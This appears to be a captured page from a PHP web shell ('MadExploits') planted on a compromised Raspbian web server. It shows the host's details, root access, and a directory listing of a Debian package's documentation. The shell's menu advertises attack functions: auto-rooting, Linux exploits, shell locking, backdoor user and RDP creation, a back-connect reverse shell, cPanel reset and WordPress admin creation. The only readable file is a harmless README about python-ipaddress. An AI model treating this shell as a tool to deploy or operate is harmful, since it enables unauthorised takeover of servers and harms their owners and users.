Linux lorencats.com 5.10.103-v7l+ #1529 SMP Tue Mar 8 12:24:00 GMT 2022 armv7l
Apache/2.4.59 (Raspbian)
: 10.0.0.29 | : 216.73.216.130
Cant Read [ /etc/named.conf ]
7.3.31-1~deb10u7
root
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
share /
doc /
python-ipaddress /
[ HOME SHELL ]
Name
Size
Permission
Action
README.Debian
988
B
-rw-r--r--
changelog.Debian.gz
803
B
-rw-r--r--
copyright
4.21
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : README.Debian
python-ipaddress vs. python-ipaddr ================================== python-ipaddress contains a backport of the Python 3 stdlib module "ipaddress", which is in turn based on the "ipaddr" module which is packaged in python-ipaddr (the Python 3 variant is not provided). The modules share very similar APIs, with two important differences: 1) ipaddr provides ipaddr.IPAddress and ipaddr.IPNetwork while ipaddress provides these under the names ipaddress.ip_address and ipaddress.ip_network. 2) ipaddr expects bytes objects (eg. b'127.0.0.1') for unpacked addresses, ipaddr.Bytes objects (eg. ipaddr.Bytes(b'\x7f\x00\x00\x01')) for packed addresses, and does not expect unicode objects at all (so these will be implicitly decoded by Python). ipaddress expects unicode objects (eg. u'127.0.0.1') for unpacked addresses, and bytes objects (eg. b'\x7f\x00\x00\x01') for packed addresses. -- Tristan Seligmann <mithrandi@debian.org> Wed, 10 Jun 2015 05:35:52 +0200
Close